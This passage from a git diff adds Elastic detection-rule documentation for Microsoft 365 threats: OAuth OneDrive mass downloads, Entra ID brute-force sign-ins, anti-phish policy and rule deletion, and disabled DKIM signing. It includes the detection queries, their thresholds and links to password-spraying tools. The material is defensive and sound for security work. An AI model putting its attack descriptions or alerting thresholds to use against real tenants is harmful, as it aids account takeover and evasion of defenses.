This method allows adversaries to bypass traditional authentication mechanisms, making it a stealthy and effective technique. + +This rule leverages ESQL aggregations which limit the field values available in the alert document. To investigate further, it is recommended to identify the original documents ingested. + + +*Possible Investigation Steps* + + +- Review the `o365.audit.UserId` field to identify the user who performed the downloads. Check if this user typically downloads large amounts of data from OneDrive. +- Correlate `o365.audit.UserId` with Entra Sign-In logs to verify the authentication method used and determine if it was expected for this user. +- Review the authentication method used. If OAuth authentication was used, investigate whether it was expected for this user. +- Identify the client application used for authentication. Determine if it is a legitimate enterprise-approved app or an unauthorized third-party application. +- Check the number of unique files downloaded. If a user downloads a high volume of unique files in a short period, it may indicate data exfiltration. +- Analyze the file types and directories accessed to determine if sensitive or confidential data was involved. +- Investigate the source IP address and geolocation of the download activity. If it originates from an unusual or anonymized location, further scrutiny is needed. +- Review other recent activities from the same user, such as file access, sharing, or permission changes, that may indicate further compromise. +- Check for signs of session persistence using OAuth. If Azure sign-in logs are correlated where `authentication_protocol` or `originalTransferMethod` field shows `deviceCode`, the session was established through device code authentication. +- Look for multiple authentication attempts from different devices or locations within a short timeframe, which could indicate unauthorized access. +- Investigate if other OAuth-related anomalies exist, such as consent grants for unfamiliar applications or unexpected refresh token activity. +- Review the `file.directory` value from the original documents to identify the specific folders or paths where the files were downloaded. + + +*False Positive Analysis* + + +- Verify if the user regularly downloads large batches of files as part of their job function. +- Determine if the downloads were triggered by an authorized automated process, such as a data backup or synchronization tool. +- Confirm if the detected OAuth application is approved for enterprise use and aligns with expected usage patterns. + + +*Response and Remediation* + + +- If unauthorized activity is confirmed, revoke the OAuth token used and terminate active OneDrive sessions. +- Reset the affected user's password and require reauthentication to prevent continued unauthorized access. +- Restrict OAuth app permissions and enforce conditional access policies to limit authentication to trusted devices and applications. +- Monitor for additional signs of compromise, such as unusual email forwarding rules, external sharing of OneDrive files, or privilege escalation attempts. +- Educate users on OAuth phishing risks and encourage the use of **Microsoft Defender for Office 365 Safe Links** to mitigate credential-based attacks. +- Enable continuous monitoring for OAuth authentication anomalies using **Microsoft Entra ID sign-in logs** and security tools. 
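+
+
+*Example pivot query*
+
+
+Because the rule aggregates events, the alert only carries the grouped field values. As a starting point for identifying the original documents, the ESQL sketch below pulls the underlying FileDownloaded events for a single flagged user; it assumes the same logs-o365.audit-* data stream used by the rule, and the user ID is a hypothetical placeholder to replace with the o365.audit.UserId value from the alert.
+
+[source, js]
+----------------------------------
+from logs-o365.audit-*
+| where event.dataset == "o365.audit"
+    and event.provider == "OneDrive"
+    and event.action == "FileDownloaded"
+    and o365.audit.AuthenticationType == "OAuth"
+    and o365.audit.UserId == "user@example.com" // placeholder: UserId from the alert
+| keep @timestamp, o365.audit.UserId, source.ip, file.name, file.directory
+| sort @timestamp asc
+----------------------------------
+
+Reviewing the returned file.directory and file.name values alongside the source IP addresses shows which folders were swept and whether the volume and locations match the user's normal behavior.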
+ + +==== Rule query + + +[source, js] +---------------------------------- +from logs-o365.audit-* +| where + @timestamp > now() - 14d and + event.dataset == "o365.audit" and + event.provider == "OneDrive" and + event.action == "FileDownloaded" and + o365.audit.AuthenticationType == "OAuth" and + event.outcome == "success" +| eval + Esql.time_window_date_trunc = date_trunc(1 minutes, @timestamp) +| keep + Esql.time_window_date_trunc, + o365.audit.UserId, + file.name, + source.ip +| stats + Esql.file_name_count_distinct = count_distinct(file.name), + Esql.event_count = count(*) + by + Esql.time_window_date_trunc, + o365.audit.UserId, + source.ip +| where + Esql.file_name_count_distinct >= 25 + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Collection +** ID: TA0009 +** Reference URL: https://attack.mitre.org/tactics/TA0009/ +* Technique: +** Name: Data from Cloud Storage +** ID: T1530 +** Reference URL: https://attack.mitre.org/techniques/T1530/ +* Tactic: +** Name: Exfiltration +** ID: TA0010 +** Reference URL: https://attack.mitre.org/tactics/TA0010/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-microsoft-365-brute-force-via-entra-id-sign-ins.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-microsoft-365-brute-force-via-entra-id-sign-ins.asciidoc new file mode 100644 index 0000000000..0ca1e2afdb --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-microsoft-365-brute-force-via-entra-id-sign-ins.asciidoc @@ -0,0 +1,275 @@ +[[prebuilt-rule-8-19-8-microsoft-365-brute-force-via-entra-id-sign-ins]] +=== Microsoft 365 Brute Force via Entra ID Sign-Ins + +Identifies potential brute-force attacks targeting Microsoft 365 user accounts by analyzing failed sign-in patterns in Microsoft Entra ID Sign-In Logs. This detection focuses on a high volume of failed interactive or non-interactive authentication attempts within a short time window, often indicative of password spraying, credential stuffing, or password guessing. Adversaries may use these techniques to gain unauthorized access to Microsoft 365 services such as Exchange Online, SharePoint, or Teams. 
+ +*Rule type*: esql + +*Rule indices*: None + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 15m + +*Searches indices from*: now-60m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://cloud.hacktricks.xyz/pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/az-password-spraying +* https://learn.microsoft.com/en-us/security/operations/incident-response-playbook-password-spray +* https://learn.microsoft.com/en-us/purview/audit-log-detailed-properties +* https://securityscorecard.com/research/massive-botnet-targets-m365-with-stealthy-password-spraying-attacks/ +* https://learn.microsoft.com/en-us/entra/identity-platform/reference-error-codes +* https://github.com/0xZDH/Omnispray +* https://github.com/0xZDH/o365spray + +*Tags*: + +* Domain: Cloud +* Domain: SaaS +* Domain: Identity +* Data Source: Azure +* Data Source: Entra ID +* Data Source: Entra ID Sign-in Logs +* Use Case: Identity and Access Audit +* Use Case: Threat Detection +* Tactic: Credential Access +* Resources: Investigation Guide + +*Version*: 107 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + + +*Investigating Microsoft 365 Brute Force via Entra ID Sign-Ins* + + +Identifies brute-force authentication activity against Microsoft 365 services using Entra ID sign-in logs. This detection groups and classifies failed sign-in attempts based on behavior indicative of password spraying, credential stuffing, or password guessing. The classification (`bf_type`) is included for immediate triage. + + +*Possible investigation steps* + + +- Review `bf_type`: Classifies the brute-force behavior (`password_spraying`, `credential_stuffing`, `password_guessing`). +- Examine `user_id_list`: Review the identities targeted. Are they admins, service accounts, or external identities? +- Review `login_errors`: Multiple identical errors (e.g., `"Invalid grant..."`) suggest automated abuse or tooling. +- Check `ip_list` and `source_orgs`: Determine if requests came from known VPNs, hosting providers, or anonymized infrastructure. +- Validate `unique_ips` and `countries`: Multiple countries or IPs in a short window may indicate credential stuffing or distributed spray attempts. +- Compare `total_attempts` vs `duration_seconds`: High volume over a short duration supports non-human interaction. +- Inspect `user_agent.original` via `device_detail_browser`: Clients like `Python Requests` or `curl` are highly suspicious. +- Investigate `client_app_display_name` and `incoming_token_type`: Identify non-browser-based logins, token abuse or commonly mimicked clients like VSCode. +- Review `target_resource_display_name`: Confirm the service being targeted (e.g., SharePoint, Exchange). This may be what authorization is being attempted against. +- Pivot using `session_id` and `device_detail_device_id`: Determine if a single device is spraying multiple accounts. +- Check `conditional_access_status`: If "notApplied", determine whether conditional access is properly scoped. +- Correlate `user_principal_name` with successful sign-ins: Investigate surrounding logs for lateral movement or privilege abuse. + + +*False positive analysis* + + +- Developer automation (e.g., CI/CD logins) or mobile sync errors may create noisy but benign login failures. +- Red team exercises or pentesting can resemble brute-force patterns. 
+- Legacy protocols or misconfigured service principals may trigger repeated login failures from the same IP or session. + + +*Response and remediation* + + +- Notify identity or security operations teams to investigate further. +- Lock or reset affected user accounts if compromise is suspected. +- Block the source IP(s) or ASN temporarily using conditional access or firewall rules. +- Review tenant-wide MFA and conditional access enforcement. +- Audit targeted accounts for password reuse across systems or tenants. +- Enable lockout or throttling policies for repeated failed login attempts. + + +==== Rule query + + +[source, js] +---------------------------------- +from logs-azure.signinlogs-* + +| eval + Esql.time_window_date_trunc = date_trunc(15 minutes, @timestamp), + Esql_priv.azure_signinlogs_properties_user_principal_name_lower = to_lower(azure.signinlogs.properties.user_principal_name), + Esql.azure_signinlogs_properties_incoming_token_type_lower = to_lower(azure.signinlogs.properties.incoming_token_type), + Esql.azure_signinlogs_properties_app_display_name_lower = to_lower(azure.signinlogs.properties.app_display_name), + Esql.user_agent_original = user_agent.original + +| where event.dataset == "azure.signinlogs" + and event.category == "authentication" + and azure.signinlogs.category in ("NonInteractiveUserSignInLogs", "SignInLogs") + and azure.signinlogs.properties.resource_display_name rlike "(.*)365|SharePoint|Exchange|Teams|Office(.*)" + and event.outcome == "failure" + and azure.signinlogs.properties.status.error_code != 50053 + and azure.signinlogs.properties.status.error_code in ( + 50034, // UserAccountNotFound + 50126, // InvalidUsernameOrPassword + 50055, // PasswordExpired + 50056, // InvalidPassword + 50057, // UserDisabled + 50064, // CredentialValidationFailure + 50076, // MFARequiredButNotPassed + 50079, // MFARegistrationRequired + 50105, // EntitlementGrantsNotFound + 70000, // InvalidGrant + 70008, // ExpiredOrRevokedRefreshToken + 70043, // BadTokenDueToSignInFrequency + 80002, // OnPremisePasswordValidatorRequestTimedOut + 80005, // OnPremisePasswordValidatorUnpredictableWebException + 50144, // InvalidPasswordExpiredOnPremPassword + 50135, // PasswordChangeCompromisedPassword + 50142, // PasswordChangeRequiredConditionalAccess + 120000, // PasswordChangeIncorrectCurrentPassword + 120002, // PasswordChangeInvalidNewPasswordWeak + 120020 // PasswordChangeFailure + ) + and azure.signinlogs.properties.user_principal_name is not null + and azure.signinlogs.properties.user_principal_name != "" + and user_agent.original != "Mozilla/5.0 (compatible; MSAL 1.0) PKeyAuth/1.0" + +| stats + Esql.azure_signinlogs_properties_authentication_requirement_values = values(azure.signinlogs.properties.authentication_requirement), + Esql.azure_signinlogs_properties_app_id_values = values(azure.signinlogs.properties.app_id), + Esql.azure_signinlogs_properties_app_display_name_values = values(azure.signinlogs.properties.app_display_name), + Esql.azure_signinlogs_properties_resource_id_values = values(azure.signinlogs.properties.resource_id), + Esql.azure_signinlogs_properties_resource_display_name_values = values(azure.signinlogs.properties.resource_display_name), + Esql.azure_signinlogs_properties_conditional_access_status_values = values(azure.signinlogs.properties.conditional_access_status), + Esql.azure_signinlogs_properties_device_detail_browser_values = values(azure.signinlogs.properties.device_detail.browser), + Esql.azure_signinlogs_properties_device_detail_device_id_values = 
values(azure.signinlogs.properties.device_detail.device_id), + Esql.azure_signinlogs_properties_device_detail_operating_system_values = values(azure.signinlogs.properties.device_detail.operating_system), + Esql.azure_signinlogs_properties_incoming_token_type_values = values(azure.signinlogs.properties.incoming_token_type), + Esql.azure_signinlogs_properties_risk_state_values = values(azure.signinlogs.properties.risk_state), + Esql.azure_signinlogs_properties_session_id_values = values(azure.signinlogs.properties.session_id), + Esql.azure_signinlogs_properties_user_id_values = values(azure.signinlogs.properties.user_id), + Esql_priv.azure_signinlogs_properties_user_principal_name_values = values(azure.signinlogs.properties.user_principal_name), + Esql.azure_signinlogs_result_description_values = values(azure.signinlogs.result_description), + Esql.azure_signinlogs_result_signature_values = values(azure.signinlogs.result_signature), + Esql.azure_signinlogs_result_type_values = values(azure.signinlogs.result_type), + + Esql.azure_signinlogs_properties_user_principal_name_lower_count_distinct = count_distinct(Esql_priv.azure_signinlogs_properties_user_principal_name_lower), + Esql_priv.azure_signinlogs_properties_user_principal_name_lower_values = values(Esql_priv.azure_signinlogs_properties_user_principal_name_lower), + Esql.azure_signinlogs_result_description_count_distinct = count_distinct(azure.signinlogs.result_description), + Esql.azure_signinlogs_result_description_values = values(azure.signinlogs.result_description), + Esql.azure_signinlogs_properties_status_error_code_count_distinct = count_distinct(azure.signinlogs.properties.status.error_code), + Esql.azure_signinlogs_properties_status_error_code_values = values(azure.signinlogs.properties.status.error_code), + Esql.azure_signinlogs_properties_incoming_token_type_lower_values = values(Esql.azure_signinlogs_properties_incoming_token_type_lower), + Esql.azure_signinlogs_properties_app_display_name_lower_values = values(Esql.azure_signinlogs_properties_app_display_name_lower), + Esql.source_ip_values = values(source.ip), + Esql.source_ip_count_distinct = count_distinct(source.ip), + Esql.source_as_organization_name_values = values(source.`as`.organization.name), + Esql.source_as_organization_name_count_distinct = count_distinct(source.`as`.organization.name), + Esql.source_geo_country_name_values = values(source.geo.country_name), + Esql.source_geo_country_name_count_distinct = count_distinct(source.geo.country_name), + Esql.@timestamp.min = min(@timestamp), + Esql.@timestamp.max = max(@timestamp), + Esql.event_count = count() +by Esql.time_window_date_trunc + +| eval + Esql.event_duration_seconds = date_diff("seconds", Esql.@timestamp.min, Esql.@timestamp.max), + Esql.event_bf_type = case( + Esql.azure_signinlogs_properties_user_principal_name_lower_count_distinct >= 10 + and Esql.event_count >= 30 + and Esql.azure_signinlogs_result_description_count_distinct <= 3 + and Esql.source_ip_count_distinct >= 5 + and Esql.event_duration_seconds <= 600 + and Esql.azure_signinlogs_properties_user_principal_name_lower_count_distinct > Esql.source_ip_count_distinct, + "credential_stuffing", + + Esql.azure_signinlogs_properties_user_principal_name_lower_count_distinct >= 15 + and Esql.azure_signinlogs_result_description_count_distinct == 1 + and Esql.event_count >= 15 + and Esql.event_duration_seconds <= 1800, + "password_spraying", + + (Esql.azure_signinlogs_properties_user_principal_name_lower_count_distinct == 1 + and 
Esql.azure_signinlogs_result_description_count_distinct == 1 + and Esql.event_count >= 30 + and Esql.event_duration_seconds <= 300) + or (Esql.azure_signinlogs_properties_user_principal_name_lower_count_distinct <= 3 + and Esql.source_ip_count_distinct > 30 + and Esql.event_count >= 100), + "password_guessing", + + "other" + ) + +| where Esql.event_bf_type != "other" + +| keep + Esql.time_window_date_trunc, + Esql.event_bf_type, + Esql.event_duration_seconds, + Esql.event_count, + Esql.@timestamp.min, + Esql.@timestamp.max, + Esql.azure_signinlogs_properties_user_principal_name_lower_count_distinct, + Esql_priv.azure_signinlogs_properties_user_principal_name_lower_values, + Esql.azure_signinlogs_result_description_count_distinct, + Esql.azure_signinlogs_result_description_values, + Esql.azure_signinlogs_properties_status_error_code_count_distinct, + Esql.azure_signinlogs_properties_status_error_code_values, + Esql.azure_signinlogs_properties_incoming_token_type_lower_values, + Esql.azure_signinlogs_properties_app_display_name_lower_values, + Esql.source_ip_values, + Esql.source_ip_count_distinct, + Esql.source_as_organization_name_values, + Esql.source_as_organization_name_count_distinct, + Esql.source_geo_country_name_values, + Esql.source_geo_country_name_count_distinct, + Esql.azure_signinlogs_properties_authentication_requirement_values, + Esql.azure_signinlogs_properties_app_id_values, + Esql.azure_signinlogs_properties_app_display_name_values, + Esql.azure_signinlogs_properties_resource_id_values, + Esql.azure_signinlogs_properties_resource_display_name_values, + Esql.azure_signinlogs_properties_conditional_access_status_values, + Esql.azure_signinlogs_properties_device_detail_browser_values, + Esql.azure_signinlogs_properties_device_detail_device_id_values, + Esql.azure_signinlogs_properties_device_detail_operating_system_values, + Esql.azure_signinlogs_properties_incoming_token_type_values, + Esql.azure_signinlogs_properties_risk_state_values, + Esql.azure_signinlogs_properties_session_id_values, + Esql.azure_signinlogs_properties_user_id_values + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Credential Access +** ID: TA0006 +** Reference URL: https://attack.mitre.org/tactics/TA0006/ +* Technique: +** Name: Brute Force +** ID: T1110 +** Reference URL: https://attack.mitre.org/techniques/T1110/ +* Sub-technique: +** Name: Password Guessing +** ID: T1110.001 +** Reference URL: https://attack.mitre.org/techniques/T1110/001/ +* Sub-technique: +** Name: Password Spraying +** ID: T1110.003 +** Reference URL: https://attack.mitre.org/techniques/T1110/003/ +* Sub-technique: +** Name: Credential Stuffing +** ID: T1110.004 +** Reference URL: https://attack.mitre.org/techniques/T1110/004/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-microsoft-365-exchange-anti-phish-policy-deletion.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-microsoft-365-exchange-anti-phish-policy-deletion.asciidoc new file mode 100644 index 0000000000..6bc3a468b3 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-microsoft-365-exchange-anti-phish-policy-deletion.asciidoc @@ -0,0 +1,121 @@ +[[prebuilt-rule-8-19-8-microsoft-365-exchange-anti-phish-policy-deletion]] +=== Microsoft 365 Exchange Anti-Phish Policy Deletion + +Identifies the deletion of an anti-phishing policy in Microsoft 365. 
By default, Microsoft 365 includes built-in features that help protect users from phishing attacks. Anti-phishing policies increase this protection by refining settings to better detect and prevent attacks.
+
+*Rule type*: query
+
+*Rule indices*:
+
+* logs-o365.audit-*
+* filebeat-*
+
+*Severity*: medium
+
+*Risk score*: 47
+
+*Runs every*: 5m
+
+*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>)
+
+*Maximum alerts per execution*: 100
+
+*References*:
+
+* https://docs.microsoft.com/en-us/powershell/module/exchange/remove-antiphishpolicy?view=exchange-ps
+* https://docs.microsoft.com/en-us/microsoft-365/security/office-365-security/set-up-anti-phishing-policies?view=o365-worldwide
+
+*Tags*:
+
+* Domain: Cloud
+* Data Source: Microsoft 365
+* Use Case: Configuration Audit
+* Tactic: Defense Evasion
+* Resources: Investigation Guide
+
+*Version*: 210
+
+*Rule authors*:
+
+* Elastic
+
+*Rule license*: Elastic License v2
+
+
+==== Investigation guide
+
+
+
+*Triage and analysis*
+
+
+> **Disclaimer**:
+> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.
+
+
+*Investigating Microsoft 365 Exchange Anti-Phish Policy Deletion*
+
+
+Microsoft 365's anti-phishing policies enhance security by fine-tuning detection settings to thwart phishing attacks. Adversaries may delete these policies to weaken defenses, facilitating unauthorized access. The detection rule monitors audit logs for successful deletions of anti-phishing policies, signaling potential malicious activity by identifying specific actions and outcomes associated with policy removal.
+
+
+*Possible investigation steps*
+
+
+- Review the audit logs for the specific event.action "Remove-AntiPhishPolicy" to identify the user account responsible for the deletion.
+- Check the event.outcome field to confirm the success of the policy deletion and gather additional context from related logs around the same timestamp.
+- Investigate the user account's recent activities in Microsoft 365 to identify any other suspicious actions or anomalies, such as unusual login locations or times.
+- Assess whether the user account has been compromised by checking for any unauthorized access attempts or changes in account settings.
+- Evaluate the impact of the deleted anti-phishing policy by reviewing the organization's current phishing protection measures and any recent phishing incidents.
+- Coordinate with the IT security team to determine if the policy deletion was authorized or part of a legitimate change management process.
+
+
+*False positive analysis*
+
+
+- Routine administrative actions may trigger the rule if IT staff regularly update or remove outdated anti-phishing policies. To manage this, create exceptions for known administrative accounts performing these actions.
+- Scheduled policy reviews might involve the removal of policies as part of a legitimate update process. Document these schedules and exclude them from triggering alerts by setting time-based exceptions.
+- Automated scripts used for policy management can inadvertently cause false positives. Identify and whitelist these scripts to prevent unnecessary alerts.
+- Changes in organizational policy that require the removal of certain anti-phishing policies can be mistaken for malicious activity.
Ensure that such changes are communicated and logged, and adjust the rule to recognize these legitimate actions. +- Test environments where policies are frequently added and removed for validation purposes can generate false positives. Exclude these environments from the rule to avoid confusion. + + +*Response and remediation* + + +- Immediately isolate the affected user accounts and systems to prevent further unauthorized access or data exfiltration. +- Recreate the deleted anti-phishing policy using the latest security guidelines and ensure it is applied across all relevant user groups. +- Conduct a thorough review of recent email activity and logs for the affected accounts to identify any phishing emails that may have bypassed security measures. +- Reset passwords for affected accounts and enforce multi-factor authentication (MFA) to enhance account security. +- Notify the security team and relevant stakeholders about the incident for awareness and further investigation. +- Escalate the incident to the incident response team if there is evidence of broader compromise or if sensitive data has been accessed. +- Implement enhanced monitoring and alerting for similar actions in the future to quickly detect and respond to any further attempts to delete security policies. + +==== Setup + + +The Office 365 Logs Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule. + +==== Rule query + + +[source, js] +---------------------------------- +event.dataset:o365.audit and event.provider:Exchange and event.category:web and event.action:"Remove-AntiPhishPolicy" and event.outcome:success + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Impair Defenses +** ID: T1562 +** Reference URL: https://attack.mitre.org/techniques/T1562/ +* Sub-technique: +** Name: Disable or Modify Tools +** ID: T1562.001 +** Reference URL: https://attack.mitre.org/techniques/T1562/001/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-microsoft-365-exchange-anti-phish-rule-modification.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-microsoft-365-exchange-anti-phish-rule-modification.asciidoc new file mode 100644 index 0000000000..2c7e9cbc18 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-microsoft-365-exchange-anti-phish-rule-modification.asciidoc @@ -0,0 +1,121 @@ +[[prebuilt-rule-8-19-8-microsoft-365-exchange-anti-phish-rule-modification]] +=== Microsoft 365 Exchange Anti-Phish Rule Modification + +Identifies the modification of an anti-phishing rule in Microsoft 365. By default, Microsoft 365 includes built-in features that help protect users from phishing attacks. Anti-phishing rules increase this protection by refining settings to better detect and prevent attacks. 
+ +*Rule type*: query + +*Rule indices*: + +* logs-o365.audit-* +* filebeat-* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://docs.microsoft.com/en-us/powershell/module/exchange/remove-antiphishrule?view=exchange-ps +* https://docs.microsoft.com/en-us/powershell/module/exchange/disable-antiphishrule?view=exchange-ps + +*Tags*: + +* Domain: Cloud +* Data Source: Microsoft 365 +* Use Case: Configuration Audit +* Tactic: Defense Evasion +* Resources: Investigation Guide + +*Version*: 210 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + +> **Disclaimer**: +> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs. + + +*Investigating Microsoft 365 Exchange Anti-Phish Rule Modification* + + +Microsoft 365's anti-phishing rules are crucial for safeguarding users against phishing attacks by enhancing detection and prevention settings. Adversaries may attempt to modify or disable these rules to facilitate phishing campaigns, gaining unauthorized access. The detection rule monitors for successful modifications or disabling of anti-phishing rules, signaling potential malicious activity by tracking specific actions within the Exchange environment. + + +*Possible investigation steps* + + +- Review the event logs for entries with event.dataset set to o365.audit and event.provider set to Exchange to confirm the context of the alert. +- Check the event.action field for "Remove-AntiPhishRule" or "Disable-AntiPhishRule" to identify the specific action taken on the anti-phishing rule. +- Verify the event.outcome field to ensure the action was successful, indicating a potential security concern. +- Identify the user or account associated with the modification by examining the relevant user fields in the event log. +- Investigate the user's recent activity and access patterns to determine if there are any other suspicious actions or anomalies. +- Assess the impact of the rule modification by reviewing any subsequent phishing attempts or security incidents that may have occurred. +- Consider reverting the changes to the anti-phishing rule and implementing additional security measures if unauthorized access is confirmed. + + +*False positive analysis* + + +- Administrative changes: Legitimate administrative tasks may involve modifying or disabling anti-phishing rules for testing or configuration purposes. To manage this, create exceptions for known administrative accounts or scheduled maintenance windows. +- Security audits: Regular security audits might require temporary adjustments to anti-phishing rules. Document these activities and exclude them from alerts by correlating with audit logs. +- Third-party integrations: Some third-party security tools may interact with Microsoft 365 settings, triggering rule modifications. Identify these tools and exclude their actions from triggering alerts by using their specific identifiers. +- Policy updates: Organizational policy changes might necessitate updates to anti-phishing rules. 
Ensure these changes are documented and exclude them from alerts by associating them with approved change management processes. + + +*Response and remediation* + + +- Immediately isolate the affected user accounts to prevent further unauthorized access and potential spread of phishing attacks. +- Revert any unauthorized changes to the anti-phishing rules by restoring them to their previous configurations using backup or documented settings. +- Conduct a thorough review of recent email logs and user activity to identify any potential phishing emails that may have bypassed the modified rules and take steps to quarantine or delete them. +- Notify the security team and relevant stakeholders about the incident, providing details of the rule modification and any identified phishing attempts. +- Escalate the incident to the incident response team for further investigation and to determine if additional systems or data have been compromised. +- Implement enhanced monitoring and alerting for any further attempts to modify anti-phishing rules, ensuring that similar activities are detected promptly. +- Review and update access controls and permissions for administrative actions within Microsoft 365 to ensure that only authorized personnel can modify security settings. + +==== Setup + + +The Office 365 Logs Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule. + +==== Rule query + + +[source, js] +---------------------------------- +event.dataset:o365.audit and event.provider:Exchange and event.category:web and event.action:("Remove-AntiPhishRule" or "Disable-AntiPhishRule") and event.outcome:success + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Impair Defenses +** ID: T1562 +** Reference URL: https://attack.mitre.org/techniques/T1562/ +* Sub-technique: +** Name: Disable or Modify Tools +** ID: T1562.001 +** Reference URL: https://attack.mitre.org/techniques/T1562/001/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-microsoft-365-exchange-dkim-signing-configuration-disabled.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-microsoft-365-exchange-dkim-signing-configuration-disabled.asciidoc new file mode 100644 index 0000000000..5cce3893e1 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-microsoft-365-exchange-dkim-signing-configuration-disabled.asciidoc @@ -0,0 +1,118 @@ +[[prebuilt-rule-8-19-8-microsoft-365-exchange-dkim-signing-configuration-disabled]] +=== Microsoft 365 Exchange DKIM Signing Configuration Disabled + +Identifies when a DomainKeys Identified Mail (DKIM) signing configuration is disabled in Microsoft 365. With DKIM in Microsoft 365, messages that are sent from Exchange Online will be cryptographically signed. This will allow the receiving email system to validate that the messages were generated by a server that the organization authorized and were not spoofed. 
+ +*Rule type*: query + +*Rule indices*: + +* logs-o365.audit-* +* filebeat-* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://docs.microsoft.com/en-us/powershell/module/exchange/set-dkimsigningconfig?view=exchange-ps + +*Tags*: + +* Domain: Cloud +* Data Source: Microsoft 365 +* Tactic: Defense Evasion +* Resources: Investigation Guide + +*Version*: 210 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + +> **Disclaimer**: +> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs. + + +*Investigating Microsoft 365 Exchange DKIM Signing Configuration Disabled* + + +DomainKeys Identified Mail (DKIM) is a security protocol that ensures email authenticity by allowing recipients to verify that messages are sent from authorized servers. Disabling DKIM can expose organizations to email spoofing, where attackers impersonate legitimate domains to conduct phishing attacks. The detection rule identifies when DKIM is disabled in Microsoft 365, signaling potential unauthorized changes that could facilitate persistent threats. + + +*Possible investigation steps* + + +- Review the audit logs in Microsoft 365 to identify the user or service account associated with the event.action "Set-DkimSigningConfig" where o365.audit.Parameters.Enabled is False. This will help determine who or what initiated the change. +- Check the event.timestamp to establish when the DKIM signing configuration was disabled and correlate this with any other suspicious activities or changes in the environment around the same time. +- Investigate the event.outcome field to confirm that the action was successful and not a failed attempt, which could indicate a misconfiguration or unauthorized access attempt. +- Examine the event.provider and event.category fields to ensure that the event is specifically related to Exchange and web actions, confirming the context of the alert. +- Assess the risk score and severity level to prioritize the investigation and determine if immediate action is required to mitigate potential threats. +- Look into any recent changes in administrative roles or permissions that could have allowed unauthorized users to disable DKIM signing, focusing on persistence tactics as indicated by the MITRE ATT&CK framework reference. + + +*False positive analysis* + + +- Routine administrative changes: Sometimes, DKIM signing configurations may be disabled temporarily during routine maintenance or updates by authorized IT personnel. To manage this, establish a process to document and approve such changes, and create exceptions in the monitoring system for these documented events. +- Testing and troubleshooting: IT teams may disable DKIM as part of testing or troubleshooting email configurations. Ensure that these activities are logged and approved, and consider setting up alerts that differentiate between test environments and production environments to reduce noise. +- Configuration migrations: During migrations to new email systems or configurations, DKIM may be disabled as part of the transition process. 
Implement a change management protocol that includes notifying the security team of planned migrations, allowing them to temporarily adjust monitoring rules. +- Third-party integrations: Some third-party email services may require DKIM to be disabled temporarily for integration purposes. Maintain a list of approved third-party services and create exceptions for these specific cases, ensuring that the security team is aware of and has approved the integration. + + +*Response and remediation* + + +- Immediately re-enable DKIM signing for the affected domain in Microsoft 365 to restore email authenticity and prevent potential spoofing attacks. +- Conduct a review of recent administrative activities in Microsoft 365 to identify any unauthorized changes or suspicious behavior that may have led to the DKIM configuration being disabled. +- Notify the security team and relevant stakeholders about the incident, providing details of the unauthorized change and potential risks associated with it. +- Implement additional monitoring on the affected domain and related accounts to detect any further unauthorized changes or suspicious activities. +- Review and update access controls and permissions for administrative accounts in Microsoft 365 to ensure that only authorized personnel can modify DKIM settings. +- Escalate the incident to the organization's incident response team for further investigation and to determine if any additional security measures are necessary. +- Consider implementing additional email security measures, such as SPF and DMARC, to complement DKIM and enhance overall email security posture. + +==== Setup + + +The Office 365 Logs Fleet integration, Filebeat module, or similarly structured data is required to be compatible 